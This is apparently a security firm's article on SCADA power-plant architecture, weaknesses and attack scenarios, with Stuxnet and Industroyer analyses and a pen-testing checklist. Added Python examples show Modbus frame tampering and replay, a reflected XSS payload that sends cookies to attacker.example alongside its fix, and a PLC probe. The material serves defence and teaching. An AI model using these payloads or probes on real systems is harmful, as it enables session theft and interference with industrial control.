TYPICAL ARCHITECTURE OF SCADA POWER PLANT
The model consists of three major compartments or network areas, namely the ENTERPRISE NETWORK, the PROCESS NETWORK and the CONTROL NETWORK.
ENTERPRISE NETWORK
1. Provides services for all enterprise business operations, such as web/email servers, application servers and workstations.
2. Regular access to the Internet or intranet.
3. Firewall protected (Tier I security).
PROCESS NETWORK
1. Consists of the Master Terminal Unit (MTU), the HMIs and the database historian.
2. Provides the interface through which the operator exercises control and supervisory actions over all other subcomponents and field devices for efficient operation of the SCADA system.
3. Firewall protected (Tier II security).
CONTROL NETWORK
1. Comprises the field instrumentation: Remote Telemetry Units (RTUs), sensors/IEDs and actuators.
2. Modern SCADA also uses Intelligent Electronic Devices (IEDs), microprocessor-based field devices that combine sensing with local control logic and can take the place of a Programmable Logic Controller (PLC).
3. Secured WAN link (Tier III security).
SECURITY ISSUES OF SCADA
SECURITY ISSUES WITH MTU
- Outdated operating system, applications and antivirus.
- Updating to the latest versions might cause operational instability, affecting system availability, so patches are often deferred.
- Attacks that could compromise the MTU: SQL injection, buffer overflow, lack of privilege separation, etc.
- Physical and deliberate compromise by an insider; negligence by the operator in recognising a false alarm or in adhering to the security policies.
SECURITY ISSUES WITH HMI
As with the MTU, the HMI is affected by security issues resulting from an outdated operating system, software and antivirus program. Some possible threats resulting from these issues are:
1. Input validation vulnerability: improper validation of an input variable lets the software write more data than the receiving buffer can hold (a buffer overflow).
2. System-level access: when the HMI runs with system-level access by default, an attacker who compromises the HMI inherits that level and has no difficulty taking control of its entire functionality to cause havoc.
SECURITY ISSUES WITH DATABASE HISTORIAN
- Use of deprecated software and applications, lack of effective patch management and poor application development practice are the usual reasons a database historian is compromised.
- Attacks that could compromise the DBH: SQL injection, buffer overflow, cross-site scripting, etc.; XSS in particular can give an attacker the cookie-based authentication credentials needed to access the system.
SECURITY ISSUES WITH SENSORS
- Signal jamming and interference, causing signal distortion and denial of service.
- Since the sensor communicates directly with the RTU, an attacker who has penetrated the network can mount a MAN-IN-THE-MIDDLE attack: Modbus carries no authentication or encryption, so frames can be read and altered in transit.
- Attacks that could compromise sensors: MiTM, flooding, tampering, DoS and replay attacks.
SECURITY ISSUES WITH RTU
The RTU is notable for several security issues:
1. Packet modification: RTU packets in transit can be captured and modified, since the protocols used among field devices lack encryption and integrity protection and the messages travel in plain text.
2. Buffer overflow: memory on field devices such as RTUs is usually statically allocated, so a knowledgeable attacker can overrun a fixed buffer to cause a denial of service.
3. Replay attack: RTUs can be the route for a replay attack, in which a captured message is retransmitted at a later time.
4. Privilege escalation: an attacker who has penetrated the control network via a MiTM attack can raise his access level by exploiting a privilege escalation vulnerability, should the RTU in use be susceptible to one; the result is a loss of confidentiality, integrity and availability for the affected system.
SECURITY ISSUES WITH COMMUNICATION PROTOCOLS
The two most common protocols in SCADA networks are Modbus and DNP3. Modbus was originally developed by Modicon but has long been an openly published, royalty-free specification; Distributed Network Protocol (DNP3, standardised as IEEE 1815) is likewise non-vendor-specific. Both protocols, as originally specified, share the same security issue: no cryptography, and therefore no authentication, integrity protection or confidentiality for frames. DNP3 has a Secure Authentication extension (DNP3-SA) that is not yet widely deployed in the field; plain Modbus/TCP has none.
SCADA ATTACK VECTOR
Mapped to the MITRE ATT&CK framework and Cyber Threat Metrics
These represent the starting point, or point of compromise, that an adversary uses to gain an initial foothold within the target's network. For this work we identified six attack vectors against the SCADA master terminal unit from the documentation of the MITRE ATT&CK framework and Cyber Threat Metrics: removable media, three malicious web component attacks (SQL injection, XSS and buffer overflow), drive-by compromise and spear-phishing attachment.
REMOVABLE MEDIA
This attack vector is mostly used against networks that cannot easily be reached over a network link, the so-called AIR-GAPPED NETWORKS, e.g. SCADA and DCS networks. The malware is copied onto removable media (a USB stick, thumb drive, etc.) and inserted into the target system, usually by an insider with physical access to it, for example a disgruntled employee.
SPEAR PHISHING ATTACHMENT
This form of compromise takes a more targeted approach: the adversary gains access to the target network by way of a MALICIOUS EMAIL ATTACHMENT. It is a social engineering technique that uses a well-constructed, target-specific email to deliver the malware.
DRIVE-BY COMPROMISE
This method of malware infection takes advantage of a USER VISITING A WEBSITE in the course of normal browsing. It is particularly effective because, once successful, it gives the adversary access to systems on the internal network. The adversary delivers the exploit code by injecting malicious code into an otherwise legitimate website; cross-site scripting and watering hole attacks are the usual methods. Malicious adware and spyware served through legitimate websites are other routes.
MALICIOUS WEB COMPONENT (SQL INJECTION, BUFFER OVERFLOW & XSS ATTACKS)
Web pages that have been compromised with malware can be the tool by which an attack is propagated. An individual visiting such a COMPROMISED WEBPAGE can expose his system or network to the vulnerability and inadvertently download the malware. SQL injection, buffer overflow and cross-site scripting attacks are possible against web pages that are not properly secured, or whose code was not properly written and tested for bugs.
SCADA ATTACK ANALYSIS – STUXNET
Stuxnet functions by targeting machines using the Microsoft Windows operating system and networks, then seeking out Siemens Step7 software. Stuxnet reportedly compromised Iranian PLCs, collecting information on industrial systems and causing the fast-spinning centrifuges to tear themselves apart.
Stuxnet has three modules: a WORM that executes all routines related to the main payload of the attack; a LINK FILE that automatically executes the propagated copies of the worm; and a ROOTKIT component responsible for hiding all malicious files and processes, to prevent detection of Stuxnet.
It is typically introduced to the target environment via an INFECTED USB FLASH DRIVE. The worm then propagates across the network, scanning for Siemens Step7 software on computers controlling a PLC. In the absence of either criterion, Stuxnet lies dormant on the computer. If both conditions are met, Stuxnet installs its rootkit on the PLC and into the Step7 software, modifying the PLC code and issuing unexpected commands while feeding a loop of normal operating values back to the users.
For its targets, Stuxnet contains, among other things, code for MAN-IN-THE-MIDDLE ATTACK that fakes industrial process control sensor signals so an infected system does not shut down due to detected abnormal behaviour.
SCADA ATTACK ANALYSIS – INDUSTROYER
Industroyer (also referred to as Crashoverride) is a malware framework considered to have been used in the cyberattack on UKRAINE'S POWER GRID on December 17, 2016. Industroyer is the first known malware specifically designed to attack electrical grids. It is also the fourth malware publicly revealed to target industrial control systems, after Stuxnet, Havex and BlackEnergy. Industroyer can use a specialised exploit to launch a DoS attack on the Siemens SIPROTEC protection relays widely used in the power industry: by exploiting a known vulnerability (CVE-2015-5374) the malware can put the device into "firmware update" mode, in which it stops responding until it is manually restarted.
SCADA ATTACK SCENARIO
We constructed two attack scenarios. The ultimate goal of the attack in each model is to compromise the data integrity of a SCADA MASTER TERMINAL UNIT. The MTU, as explained previously, is where the ultimate control decision is made and translated into a command that is transmitted over the communication link and effected on the respective field devices. The effect of an MTU integrity compromise is therefore far-reaching and can result in physical damage.
We define an integrity-based compromise as any attempt by an attacker to circumvent the authority of the SCADA MTU operator, gaining full control of the component and issuing malicious instructions, or a deceptive action by a malicious agent aimed at luring the MTU operator into issuing wrong commands in response to a false alarm.
ATTACK SCENARIO – 1
| ATTACK GOAL | Compromising MTU integrity by REPLAY ATTACK |
| ATTACK VECTOR | Removable media |
| ATTACK AGENTS | Disgruntled field operative (malicious insider) |
| ATTACK SCOPE | Control and process network |
- The goal here is to compromise the integrity of the SCADA MTU by transmitting replayed packets.
- The attacker enlists an insider, a disgruntled field operative, who carries an undetectable (zero-day) malware on a USB stick.
- Because the malware is a zero day, the security scanner and the intrusion detection system cannot detect it: both are signature-based and have no signature for it.
- The malware exploits the absence of authentication in the Modbus communication protocol and opens a remote channel to the attacker, enabling the attacker to gather more intelligence about the system and giving him a remote presence within the control network.
- The attacker then exploits known vulnerabilities to gain initial user-level access to the RTU, and once there elevates his privilege to administrative access on the device, which lets him inject replayed packets for onward transmission to the MTU.
- The attacker thus transmits an old packet at a new time, a REPLAY ATTACK. The operator at the MTU sees the stale message as legitimate and, in response, issues the wrong control command; by issuing that command the operator has inadvertently compromised the integrity of the SCADA MTU.
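The following is an added example, not code from the original page: it builds and parses Modbus/TCP frames to show concretely why the packet modification and replay described in the sensor, RTU and protocol sections, and used against the MTU in this scenario, cannot be told apart from legitimate traffic at the protocol level, and what a monitor on the control network can still flag as a compensating control. The IP addresses, register numbers and the allow-list of authorised masters are constructed for the demonstration.

```python
"""Added example, not code from the original page: builds and parses Modbus/TCP
frames to show why a captured write command can be modified or replayed unnoticed
(protocol section, Attack Scenario 1), plus a small monitor that flags what can
still be caught. IP addresses, register numbers and the allow-list are made up."""
import struct

FC_READ_HOLDING = 0x03
FC_WRITE_SINGLE = 0x06
WRITE_CODES = {0x05, 0x06, 0x0F, 0x10, 0x16, 0x17}   # coil/register write functions
ADDRESSED_CODES = {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x0F, 0x10}  # PDUs that start with an address


def build_frame(tid, unit, pdu):
    """MBAP header: transaction id, protocol id (always 0), length, unit id; then the PDU."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def write_single_register(tid, unit, address, value):
    return build_frame(tid, unit, struct.pack(">BHH", FC_WRITE_SINGLE, address, value))


def parse_frame(frame):
    """Decode MBAP + PDU. Note what is absent: no MAC, nonce, timestamp or sequence
    check, so a receiver cannot distinguish a replayed or edited frame from a fresh one."""
    if len(frame) < 8:
        raise ValueError("short frame")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("bad MBAP header")
    pdu = frame[7:]
    info = {"tid": tid, "unit": unit, "fc": pdu[0], "pdu": pdu}
    if pdu[0] in ADDRESSED_CODES and len(pdu) >= 5:
        info["address"], info["operand"] = struct.unpack(">HH", pdu[1:5])
    return info


def tamper_value(frame, new_value):
    """Packet modification: overwrite the value field of a captured write-single-register
    frame. Header and length stay valid, so an RTU accepts the edited frame as-is."""
    if parse_frame(frame)["fc"] != FC_WRITE_SINGLE:
        raise ValueError("not a write-single-register frame")
    return frame[:-2] + struct.pack(">H", new_value)


def monitor(packets, allowed_writers):
    """Compensating control for a monitor on the control network.
    packets: list of (src_ip, dst_ip, frame). Returns alert strings for
    (a) any write function code from a host that is not an authorised master, and
    (b) a write frame byte-identical (same transaction id and PDU) to one already seen
        on the same src/dst pair, the signature of a naive replay. A replayer that
        renumbers the transaction id defeats (b); only an authenticated protocol closes that."""
    alerts, seen = [], set()
    for src, dst, frame in packets:
        info = parse_frame(frame)
        if info["fc"] not in WRITE_CODES:
            continue
        if src not in allowed_writers:
            alerts.append(f"write fc=0x{info['fc']:02x} addr={info.get('address')} "
                          f"from unauthorised {src} -> {dst}")
        key = (src, dst, frame)
        if key in seen:
            alerts.append(f"replayed write tid={info['tid']} addr={info.get('address')} "
                          f"from {src} -> {dst}")
        seen.add(key)
    return alerts


if __name__ == "__main__":
    # Constructed traffic: the MTU (10.0.2.10) legitimately sets register 40 on RTU unit 1.
    original = write_single_register(tid=17, unit=1, address=40, value=1500)
    print("original :", original.hex(), parse_frame(original))
    # Packet modification: an attacker on the path changes the setpoint from 1500 to 9000.
    edited = tamper_value(original, 9000)
    print("tampered :", edited.hex(), parse_frame(edited))
    # Replay: the same bytes sent again later; nothing in the frame marks them as old.
    traffic = [("10.0.2.10", "10.0.3.5", original),
               ("10.0.2.10", "10.0.3.5", original),   # replay from a spoofed MTU address
               ("10.0.3.99", "10.0.3.5", edited)]     # write from a compromised field host
    for alert in monitor(traffic, allowed_writers={"10.0.2.10"}):
        print("ALERT:", alert)
```

Run it as a script to see the original, tampered and replayed frames alongside the alerts. The replay heuristic only catches a replayer that resends the frame byte-for-byte; one that renumbers the transaction ID looks like fresh traffic, which is why the real fix is an authenticated transport (DNP3 Secure Authentication, or the Modbus/TCP Security specification that wraps Modbus in TLS) rather than monitoring alone.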
ANALYSIS OF ATTACK SCENARIO – 1
| FEATURE TYPE | ATTACK NODES FROM MODEL | SI SCORE |
| REMOTE ADMINISTRATION | "Malware opens up remote communication"; "Inject sensor packet data"; "Transmit replay packet" | 1 |
| STEALTH | "Modbus authentication vulnerability exploited, leading to undetected access to control network" | 1 |
| ZERO-DAY VULNERABILITY | "Malware present in USB for initial compromise"; two zero-day vulnerabilities exploited, first to obtain shell access and remotely administer the RTU, second to escalate privilege | 1 |
| APT | Multiple zero-day exploits used: Modbus authentication vulnerability exploit, RTU credential vulnerability exploit to obtain shell access, and RTU privilege escalation vulnerability exploit | 1 |
ATTACK SCENARIO – 2
| ATTACK GOAL | Compromising MTU integrity by XSS attack |
| ATTACK VECTOR | Malicious web component (XSS attack) |
| ATTACK AGENTS | Targeted-threat agent |
| ATTACK SCOPE | SCADA enterprise and process network |
- The attacker performs initial reconnaissance to gather information on the victim, an unsuspecting Enterprise Network user.
- The attacker injects an XSS payload into a web application the victim uses. Because execution of the exploit code in an XSS attack depends on the target interacting with the compromised web application, execution is achieved in one of two ways: through social engineering, where the attacker lures the Enterprise Network user into visiting a malicious URL, or through a known exploit.
- In possession of the victim's session cookie, the attacker can take over the enterprise user's session and impersonate him. Doing so he passes firewall 1 without triggering detection and reaches the web server in the enterprise network. Once a foothold has been established there, the attacker exploits a known information disclosure vulnerability to steal the administrator's session cookie and also obtain VPN credentials.
- With administrative access rights the attacker uses the VPN to tunnel into the process network, evading firewall 2. He can now stage a man-in-the-middle attack by eavesdropping on communication between components of the process network, and thereby gains limited access to the MTU. Exploiting a known privilege escalation vulnerability, he gains root access to the MTU, which gives him complete control over it; with that control he can modify MTU control signals and compromise the integrity of the entire SCADA system.
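The following is an added example, not code from the original page: it shows the defect behind the malicious web component vector and the cookie theft that opens this scenario, as a page handler that reflects user input next to its hardened form, together with the Set-Cookie attributes that keep a session cookie out of reach of injected script. The payload, the attacker host name and the session value are constructed for the demonstration.

```python
"""Added example, not code from the original page: the defect behind the malicious
web component vector and Attack Scenario 2. A page handler that reflects user input
is shown next to its hardened form, together with the Set-Cookie attributes that
keep a session cookie out of reach of injected script. The payload, the attacker
host and the cookie value are constructed for the demonstration."""
import html
from urllib.parse import quote

# Constructed payload of the kind used to steal a session cookie: the victim's
# browser fetches an image from the attacker's host with document.cookie appended.
COOKIE_THEFT_PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'


def render_search_vulnerable(query):
    """Reflected XSS: the query string is interpolated straight into the HTML."""
    return f"<h1>Results for {query}</h1>"


def render_search_hardened(query):
    """Same page with the input escaped for the HTML text context. html.escape turns
    < > & " ' into entities, so the browser renders the payload as text, not markup."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def build_search_link(query):
    """URL context needs URL encoding, not HTML escaping: percent-encode the value
    before placing it in an href, and never concatenate raw input there."""
    return f'<a href="/search?q={quote(query, safe="")}">search again</a>'


def session_set_cookie(session_id, over_https=True):
    """Set-Cookie header for the session. HttpOnly keeps the value out of
    document.cookie (so the payload above gets nothing), Secure keeps it off
    clear-text HTTP, SameSite=Strict stops the browser attaching it to cross-site requests."""
    attrs = ["Path=/", "HttpOnly", "SameSite=Strict"]
    if over_https:
        attrs.append("Secure")
    return f"session={session_id}; " + "; ".join(attrs)


def cookie_exposed_to_script(set_cookie_header):
    """True if script running in the page could read this cookie via document.cookie."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")]
    return "httponly" not in attrs


def contains_live_script(markup):
    """Crude stand-in for a browser: does the markup still contain an unescaped tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for name, page in (("vulnerable", render_search_vulnerable(COOKIE_THEFT_PAYLOAD)),
                       ("hardened", render_search_hardened(COOKIE_THEFT_PAYLOAD))):
        print(f"{name:10s} script executes: {contains_live_script(page)}\n  {page}")
    print(build_search_link(COOKIE_THEFT_PAYLOAD))
    header = session_set_cookie("c0ffee1234")
    print(header, "-> readable by injected script:", cookie_exposed_to_script(header))
```

Escaping is context-specific: the HTML text context, an attribute value and a URL parameter each need their own encoder, and a framework template engine with auto-escaping should be preferred over hand-built strings. HttpOnly does not stop XSS itself; it removes the cookie as the prize, so the attacker in this scenario would have to drive the session from the victim's browser instead of copying it.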
ANALYSIS OF ATTACK SCENARIO – 2
| FEATURE TYPE | ATTACK NODES FROM MODEL | SI SCORE |
| SOCIAL ENGINEERING | "Target visits malicious URL" | 1 |
| REMOTE ADMINISTRATION | "XSS payload injected into web application"; "Steal session cookies"; "Steal administrator credentials"; "VPN tunnelling"; "MITM attack" | 1 |
| ZERO-DAY VULNERABILITY | Three zero-days used: "XSS vulnerability exploit"; "Information disclosure vulnerability exploit"; "Privilege escalation vulnerability exploit" | |
| APT | Multiple zero-day exploits; steal user session | |
INDUSTRIAL SOLUTION TO SCADA NETWORK DEFENSE
The overall SCADA project approach contains four phases:
PROJECT INITIATION
- DEFINE PROJECT SCOPE
- IDENTIFY TERMS OF REFERENCE
- INFORMATION GATHERING
ON SITE WORK
- FACILITY TOUR
- NETWORK REVIEW
- NETWORK ANALYSIS
- HOST ASSESSMENT
OFF SITE WORK
- DOCUMENT COLLECTION
- VALIDATE NETWORK ARCHITECTURE
- ANALYZE ROUTER, SWITCH AND FIREWALL CONFIGURATIONS, HOST CONFIGURATIONS AND SCRIPTS
- PRIORITIZE AND RANK SECURITY RISKS
- PROVIDE RECOMMENDATIONS
REVIEW WITH CLIENT
- 1ST DRAFT REPORT ON FINDINGS AND RECOMMENDATIONS
- REVIEW DRAFT WITH STAKEHOLDERS FOR SUGGESTIONS AND MODIFICATIONS
- FINAL REPORT
The SCADA network sees most of its weaknesses at the enterprise level, which is highly dependent on human interaction. It is therefore always recommended to train the human resources. Training gives employees up-to-date know-how on how to recognise and mitigate a cyber threat; by making employees able to identify and eliminate cyber threats, we strengthen the most vulnerable link in the chain. Anonymity CSL provides comprehensive training programmes designed specifically for the SCADA workforce to minimise the risk of human error.
OUR APPROACH AND METHODOLOGY
The methodology ANONYMITY CSL follows is organised in six stages:
1. PROJECT PLANNING AND INITIATION
- Define project scope and terms of reference
- Define restrictions, e.g. operating hours, tolerable downtime (if any), etc.
- Customisation of assessment procedures
- Information gathering
2. DESKTOP AND SERVER SECURITY ASSESSMENT
- Check desktop/server role and compare against services running
- Check patch level
- Check permissions on critical directories
- Check logging/antivirus
3. SCADA SECURITY ASSESSMENT
- Assessment of SCADA, RTU and PLC
- Check patch level
- Check connection type and communication
- Testing of registers/coils
4. NETWORK ARCHITECTURE REVIEW AND SECURITY ASSESSMENT
- Review current network architecture design
- Conduct assessment of network device configurations
- Network sniffing
5. PHYSICAL ASSESSMENT
- Conduct physical assessment
- Check the current policy
6. ANALYSIS AND REPORTING
- Analysis of findings
- Identify risk rating
- Consolidate reports
SCADA PEN TESTING CHECKLIST
- Are all factory default credentials changed?
- Is access to PLCs whitelisted to authorised machines only? They should not be reachable from everywhere.
- Is the SCADA network separated from the rest of the network? If not, try reaching the PLCs from corporate workstations.
- Is physical access to the SCADA control centre restricted?
- Can you access the internet from the controller machine?
- Are there any clear text services running on the SCADA network?
- Does the organisation follow a strict password policy?
- Are the controller machines, workstations and servers patched? Are they running antivirus software, and is application whitelisting enforced?
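The following is an added example, not code from the original page or from any of the tools listed below: a small probe for two of the checklist items, whether PLCs are reachable from the machine you run it on (run it from a corporate workstation to test the segmentation question) and whether a clear-text service is answering. It TCP-connects to common ICS ports and, where Modbus/TCP answers, sends Read Device Identification (function 0x2B, MEI type 0x0E) with no credentials at all. A fake PLC responder on the loopback interface is included so the block runs offline; its vendor and product strings are invented.

```python
"""Added example, not code from the original page or from any listed tool: a probe
for the checklist items 'can PLCs be reached from here' and 'is a clear-text service
answering'. It TCP-connects to common ICS ports and, where Modbus/TCP answers, sends
Read Device Identification (function 0x2B, MEI type 0x0E) without any credentials.
A fake PLC responder is included so the block runs offline; its strings are invented."""
import socket
import struct
import threading

ICS_PORTS = {502: "Modbus/TCP", 102: "Siemens S7 (ISO-TSAP)", 20000: "DNP3",
             44818: "EtherNet/IP", 2404: "IEC 60870-5-104"}


def scan_ports(host, ports, timeout=0.5):
    """Return the ports that accept a TCP connection. Run from a corporate
    workstation, any hit means the SCADA segment is not actually separated."""
    reachable = []
    for port in ports:
        with socket.socket() as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                reachable.append(port)
            except OSError:
                pass
    return reachable


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed early")
        buf += chunk
    return buf


def read_device_identification(host, port=502, unit=1, timeout=2.0):
    """Ask for the basic identification objects (vendor, product code, revision).
    The request is four PDU bytes after the MBAP header and is never authenticated."""
    pdu = bytes([0x2B, 0x0E, 0x01, 0x00])            # MEI 0x0E, read basic, start at object 0
    request = struct.pack(">HHHB", 1, 0, len(pdu) + 1, unit) + pdu
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        _, proto, length, _ = struct.unpack(">HHHB", _recv_exact(s, 7))
        body = _recv_exact(s, length - 1)            # length counts the unit id byte too
    if proto != 0 or body[:2] != b"\x2b\x0e":
        raise ValueError(f"unexpected reply: {body[:2].hex()}")
    # body: fc, MEI type, read-id code, conformity, more-follows, next object, count, objects
    count, pos, objects = body[6], 7, {}
    for _ in range(count):
        obj_id, obj_len = body[pos], body[pos + 1]
        objects[obj_id] = body[pos + 2:pos + 2 + obj_len].decode("ascii", "replace")
        pos += 2 + obj_len
    return {"VendorName": objects.get(0), "ProductCode": objects.get(1),
            "MajorMinorRevision": objects.get(2)}


def start_fake_plc(vendor=b"ExampleVendor", product=b"EX-RTU-1", revision=b"1.0"):
    """Minimal Modbus/TCP responder on 127.0.0.1 answering only Read Device
    Identification. Stands in for a real PLC so the example runs offline; returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(2.0)
                try:
                    req = conn.recv(260)
                except OSError:
                    continue
                if len(req) < 11:                      # scanner connect-and-close: nothing to answer
                    continue
                tid, _, _, unit = struct.unpack(">HHHB", req[:7])
                objs = b"".join(bytes([i, len(v)]) + v
                                for i, v in enumerate((vendor, product, revision)))
                pdu = bytes([0x2B, 0x0E, 0x01, 0x01, 0x00, 0x00, 3]) + objs
                conn.sendall(struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    plc_port = start_fake_plc()                       # stands in for a PLC at e.g. 10.0.3.5:502
    targets = [plc_port] + sorted(ICS_PORTS)
    print("reachable ICS-style ports on 127.0.0.1:", scan_ports("127.0.0.1", targets))
    print("device identification (clear text):", read_device_identification("127.0.0.1", plc_port))
```

Against a real controller, point `scan_ports` and `read_device_identification` at the PLC address from the corporate segment with the asset owner's agreement and during an approved window: a device that answers here both proves the firewall rule set lets workstation traffic through and confirms an unauthenticated clear-text service, which is exactly what the checklist is asking. Some field devices fall over on unexpected input, so keep probes to read-only functions like this one.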
RECOMMENDED TOOL LIST
Here are the tools that we recommend in a SCADA assessment –
smod: Modbus penetration testing framework
plcscan: Python script for scanning PLC devices
Nmap scripts: Nmap NSE scripts for discovering and fingerprinting PLCs (e.g. modbus-discover, s7-info)
Wireshark: network sniffer, with dissectors for Modbus/TCP, DNP3 and S7comm
mbtget: Perl script to read data from a PLC over Modbus/TCP
plcinject: tool to inject code into PLCs